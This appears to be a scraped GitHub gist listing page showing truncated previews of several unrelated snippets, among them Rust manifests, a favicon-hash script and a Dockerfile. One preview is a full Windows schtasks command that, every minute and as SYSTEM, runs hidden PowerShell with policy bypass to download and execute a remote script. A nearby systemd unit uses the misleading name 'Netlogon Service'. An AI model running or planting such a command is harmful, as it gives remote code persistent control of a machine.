This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Custom Error | |
| use std::fmt; | |
| // Structure to refer application errors | |
| pub struct AppError { | |
| pub description: String | |
| } | |
| // Print error message | |
| impl fmt::Display for AppError{ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| schtasks /create /tn SysMon /tr "powershell -ep bypass -NoLogo -WindowStyle hidden -command 'IEX (New-Object Net.WebClient).DownloadString('''https://gist.githubusercontent.com/whokilleddb/8b85ccf047a77c9ffd1f707cc866038f/raw/SysMaintain.ps1''')'" /sc minute /mo 1 /ru System |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import mmh3 | |
| import sys | |
| import codecs | |
| import requests | |
| if len(sys.argv) != 2: | |
| print(f"Usage: {sys.argv[0]} [Favicon URL]") | |
| sys.exit(0) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [package] | |
| name = "sha1_cracker" | |
| version = "0.1.0" | |
| edition = "2021" | |
| # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html | |
| [dependencies] | |
| clap = "3.2.5" | |
| termion = "1.5.6" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [Unit] | |
| Description=Netlogon Service | |
| [Service] | |
| User=root | |
| WorkingDirectory=/usr/share/rex/ | |
| ExecStart=/usr/share/rex/netlogon.sh | |
| Restart=always | |
| [Install] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [package] | |
| name = "forecast" | |
| version = "0.1.0" | |
| authors = ["whokilleddb <[email protected]>"] | |
| edition = "2018" | |
| # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html | |
| [dependencies] | |
| structopt = "0.3.15" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| FROM debian:10.11 as source | |
| WORKDIR /kernel | |
| # Extra Metadata | |
| LABEL version = "0.1.0" | |
| LABEL desciption = "Compile A Kernel" | |
| # Install Dependencies | |
| FROM source as init | |
| RUN apt update -y && apt upgrade -y |
NewerOlder